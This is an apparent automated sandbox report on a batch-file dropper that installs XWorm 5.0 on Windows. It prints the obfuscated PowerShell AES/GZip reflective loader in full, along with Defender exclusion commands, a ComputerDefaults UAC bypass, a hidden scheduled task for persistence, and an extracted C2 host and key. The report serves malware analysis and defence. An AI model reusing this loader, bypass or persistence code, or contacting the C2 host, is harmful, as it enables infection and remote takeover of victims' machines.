Analysis
-
max time kernel
128s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-es -
resource tags
arch:x64arch:x86image:win10v2004-20240611-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
14/06/2024, 09:09
Static task
static1
General
-
Target
94356769733098103745363502109345554335220161306761.bat
-
Size
161KB
-
MD5
416aff758a2a587d89b208f7dabdb0ec
-
SHA1
7e908dee1cfc2885d688d8c0e9c03e88b66ea090
-
SHA256
897b124a4ef0a2886f3604babd1716017ac19577b5d74abca068ad24b21da4d6
-
SHA512
8b66d8193011d207d9b24b0a20b76e2099bd3bbaea47d0797faba7a6f9741cae95dc3d4d69943aaad7df882e10299dbdfc49d1325fd30c1128ecfd23a0474a46
-
SSDEEP
3072:oJl6l20lITvp1WNt4HkboG2vIbuoTkDa+P0o5l1MzFpiP5cNttn:oJl6w0FNt4Hk+gbTy/P0obPSNttn
Malware Config
Extracted
xworm
5.0
ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org:7772
CBNxQlZF6Bvs1OlD
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2256-109-0x0000028931CB0000-0x0000028931CC0000-memory.dmp family_xworm -
Blocklisted process makes network request 4 IoCs
flow pid Process 32 2256 powershell.exe 41 2256 powershell.exe 50 2256 powershell.exe 52 2256 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2256 powershell.exe 3260 powershell.exe 2764 powershell.exe 4488 powershell.exe 3008 powershell.exe 776 powershell.exe 3444 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 996 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 996 ComputerDefaults.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 3008 powershell.exe 3008 powershell.exe 776 powershell.exe 776 powershell.exe 2256 powershell.exe 2256 powershell.exe 3444 powershell.exe 3444 powershell.exe 3444 powershell.exe 3260 powershell.exe 3260 powershell.exe 224 powershell.exe 224 powershell.exe 3260 powershell.exe 224 powershell.exe 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 3392 powershell.exe 3392 powershell.exe 3392 powershell.exe 4488 powershell.exe 4488 powershell.exe 4488 powershell.exe 2256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeIncreaseQuotaPrivilege 224 powershell.exe Token: SeSecurityPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 224 powershell.exe Token: SeLoadDriverPrivilege 224 powershell.exe Token: SeSystemProfilePrivilege 224 powershell.exe Token: SeSystemtimePrivilege 224 powershell.exe Token: SeProfSingleProcessPrivilege 224 powershell.exe Token: SeIncBasePriorityPrivilege 224 powershell.exe Token: SeCreatePagefilePrivilege 224 powershell.exe Token: SeBackupPrivilege 224 powershell.exe Token: SeRestorePrivilege 224 powershell.exe Token: SeShutdownPrivilege 224 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeSystemEnvironmentPrivilege 224 powershell.exe Token: SeRemoteShutdownPrivilege 224 powershell.exe Token: SeUndockPrivilege 224 powershell.exe Token: SeManageVolumePrivilege 224 powershell.exe Token: 33 224 powershell.exe Token: 34 224 powershell.exe Token: 35 224 powershell.exe Token: 36 224 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeIncreaseQuotaPrivilege 2764 powershell.exe Token: SeSecurityPrivilege 2764 powershell.exe Token: SeTakeOwnershipPrivilege 2764 powershell.exe Token: SeLoadDriverPrivilege 2764 powershell.exe Token: SeSystemProfilePrivilege 2764 powershell.exe Token: SeSystemtimePrivilege 2764 powershell.exe Token: SeProfSingleProcessPrivilege 2764 powershell.exe Token: SeIncBasePriorityPrivilege 2764 powershell.exe Token: SeCreatePagefilePrivilege 2764 powershell.exe Token: SeBackupPrivilege 2764 powershell.exe Token: SeRestorePrivilege 2764 powershell.exe Token: SeShutdownPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeSystemEnvironmentPrivilege 2764 powershell.exe Token: SeRemoteShutdownPrivilege 2764 powershell.exe Token: SeUndockPrivilege 2764 powershell.exe Token: SeManageVolumePrivilege 2764 powershell.exe Token: 33 2764 powershell.exe Token: 34 2764 powershell.exe Token: 35 2764 powershell.exe Token: 36 2764 powershell.exe Token: SeIncreaseQuotaPrivilege 2764 powershell.exe Token: SeSecurityPrivilege 2764 powershell.exe Token: SeTakeOwnershipPrivilege 2764 powershell.exe Token: SeLoadDriverPrivilege 2764 powershell.exe Token: SeSystemProfilePrivilege 2764 powershell.exe Token: SeSystemtimePrivilege 2764 powershell.exe Token: SeProfSingleProcessPrivilege 2764 powershell.exe Token: SeIncBasePriorityPrivilege 2764 powershell.exe Token: SeCreatePagefilePrivilege 2764 powershell.exe Token: SeBackupPrivilege 2764 powershell.exe Token: SeRestorePrivilege 2764 powershell.exe Token: SeShutdownPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeSystemEnvironmentPrivilege 2764 powershell.exe Token: SeRemoteShutdownPrivilege 2764 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2256 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1480 wrote to memory of 3196 1480 cmd.exe 87 PID 1480 wrote to memory of 3196 1480 cmd.exe 87 PID 1480 wrote to memory of 3400 1480 cmd.exe 90 PID 1480 wrote to memory of 3400 1480 cmd.exe 90 PID 1480 wrote to memory of 3008 1480 cmd.exe 91 PID 1480 wrote to memory of 3008 1480 cmd.exe 91 PID 3008 wrote to memory of 776 3008 powershell.exe 92 PID 3008 wrote to memory of 776 3008 powershell.exe 92 PID 3008 wrote to memory of 3276 3008 powershell.exe 94 PID 3008 wrote to memory of 3276 3008 powershell.exe 94 PID 3276 wrote to memory of 996 3276 cmd.exe 96 PID 3276 wrote to memory of 996 3276 cmd.exe 96 PID 996 wrote to memory of 1772 996 ComputerDefaults.exe 97 PID 996 wrote to memory of 1772 996 ComputerDefaults.exe 97 PID 1772 wrote to memory of 1752 1772 cmd.exe 99 PID 1772 wrote to memory of 1752 1772 cmd.exe 99 PID 1772 wrote to memory of 3504 1772 cmd.exe 100 PID 1772 wrote to memory of 3504 1772 cmd.exe 100 PID 1772 wrote to memory of 2256 1772 cmd.exe 101 PID 1772 wrote to memory of 2256 1772 cmd.exe 101 PID 2256 wrote to memory of 3444 2256 powershell.exe 102 PID 2256 wrote to memory of 3444 2256 powershell.exe 102 PID 2256 wrote to memory of 3260 2256 powershell.exe 104 PID 2256 wrote to memory of 3260 2256 powershell.exe 104 PID 2256 wrote to memory of 224 2256 powershell.exe 106 PID 2256 wrote to memory of 224 2256 powershell.exe 106 PID 2256 wrote to memory of 2764 2256 powershell.exe 109 PID 2256 wrote to memory of 2764 2256 powershell.exe 109 PID 3008 wrote to memory of 396 3008 powershell.exe 111 PID 3008 wrote to memory of 396 3008 powershell.exe 111 PID 3008 wrote to memory of 3392 3008 powershell.exe 113 PID 3008 wrote to memory of 3392 3008 powershell.exe 113 PID 3008 wrote to memory of 4488 3008 powershell.exe 115 PID 3008 wrote to memory of 4488 3008 powershell.exe 115
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\94356769733098103745363502109345554335220161306761.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:3196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJtS7BW8TsXMaPIam1m2IRoAeCdHmqg1RBsmIhwSvhQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o0gE9vmLtvavEDZl9H1iuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xIQaF=New-Object System.IO.MemoryStream(,$param_var); $gboVG=New-Object System.IO.MemoryStream; $FotCK=New-Object System.IO.Compression.GZipStream($xIQaF, [IO.Compression.CompressionMode]::Decompress); $FotCK.CopyTo($gboVG); $FotCK.Dispose(); $xIQaF.Dispose(); $gboVG.Dispose(); $gboVG.ToArray();}function execute_function($param_var,$param2_var){ $nhluO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fbouC=$nhluO.EntryPoint; $fbouC.Invoke($null, $param2_var);}$BbFmy = 'C:\Users\Admin\AppData\Local\Temp\94356769733098103745363502109345554335220161306761.bat';$host.UI.RawUI.WindowTitle = $BbFmy;$XdayF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BbFmy).Split([Environment]::NewLine);foreach ($EYKSB in $XdayF) { if ($EYKSB.StartsWith('GTGaHqhKZrDmxohhGHXz')) { $CykjU=$EYKSB.Substring(20); break; }}$payloads_var=[string[]]$CykjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:3400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd5⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"6⤵PID:1752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJtS7BW8TsXMaPIam1m2IRoAeCdHmqg1RBsmIhwSvhQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o0gE9vmLtvavEDZl9H1iuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xIQaF=New-Object System.IO.MemoryStream(,$param_var); $gboVG=New-Object System.IO.MemoryStream; $FotCK=New-Object System.IO.Compression.GZipStream($xIQaF, [IO.Compression.CompressionMode]::Decompress); $FotCK.CopyTo($gboVG); $FotCK.Dispose(); $xIQaF.Dispose(); $gboVG.Dispose(); $gboVG.ToArray();}function execute_function($param_var,$param2_var){ $nhluO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fbouC=$nhluO.EntryPoint; $fbouC.Invoke($null, $param2_var);}$BbFmy = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $BbFmy;$XdayF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BbFmy).Split([Environment]::NewLine);foreach ($EYKSB in $XdayF) { if ($EYKSB.StartsWith('GTGaHqhKZrDmxohhGHXz')) { $CykjU=$EYKSB.Substring(20); break; }}$payloads_var=[string[]]$CykjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q3⤵PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\94356769733098103745363502109345554335220161306761')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4488
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD566070b46c2ce994a70b8047854428f77
SHA1a4f805736ff0dd615bc358ea8d30b2b41409fc0e
SHA25692a65c8b8dc99795fa34a24675054fc9dc3fc4651d568b26bccf539755d2d71f
SHA51260dcfe551ca1c075f54205b4380e2e537cd6d2f68e9d41a604274a6daa9a6eb3a9f6d1ae96aea85162af83e0f3da40bbdcf20fc6c24728e41babec29767789ce
-
Filesize
1KB
MD503cc95b6f2b0ab8d2a3a281bb6c2a6a1
SHA18710ac4c6b50315d61bd464f3ecac2fd604ba9ed
SHA2569a562b2bc282fae1b10879a381658bbb5ec81f5071cb9b0ae4b844d4334cdd26
SHA512f3838e09ca5fb0ca4c6ea473f536dbd04193f23e564051f7066c2bfec69931bb38f6a1bd62177c95225b33349855e5b8bc04c3a861c6473f987bc1a0064b51d5
-
Filesize
1KB
MD52114288fdfc8e55f47611663569c81ab
SHA1b90e27b1223903c32b629ba98f237ff177ccce85
SHA2565d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a
SHA512997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD596e3b86880fedd5afc001d108732a3e5
SHA18fc17b39d744a9590a6d5897012da5e6757439a3
SHA256c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d
-
Filesize
652B
MD534236a32f32cc05cbfa8c5a858f5ca4b
SHA19720c6da733d619b604835518f667433dbdc0aa9
SHA2567faaf078f4915961253fa87f72c15f1ef388d982d68db21da7a70433f64637bc
SHA5126e1f040e035a4d7ff3af28a1b9c8f8f136551122010860c3e9ef5f8b0873a71c2cd4598437a3bbdb4deca94845ccaa78a5d593642625457d3b32d34e245e3b46
-
Filesize
161KB
MD5416aff758a2a587d89b208f7dabdb0ec
SHA17e908dee1cfc2885d688d8c0e9c03e88b66ea090
SHA256897b124a4ef0a2886f3604babd1716017ac19577b5d74abca068ad24b21da4d6
SHA5128b66d8193011d207d9b24b0a20b76e2099bd3bbaea47d0797faba7a6f9741cae95dc3d4d69943aaad7df882e10299dbdfc49d1325fd30c1128ecfd23a0474a46
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
145KB
MD58a9bfed8af000238af4b99880fe3d4cc
SHA147f00e89548a73d539bce69243007b9ba7d82515
SHA2566c41e2d7b70570d7e4f251c471bd6ed7f2c37834edf55f2148b5e13fb362243e
SHA512699b514aebd561e2f25bd28e670d9a1408c4c6c369a92cbdd6d973b845a49defbb23ef1060efeeabea19644b9ab2cbc4327ef5a6840880323bba591b95b8fb10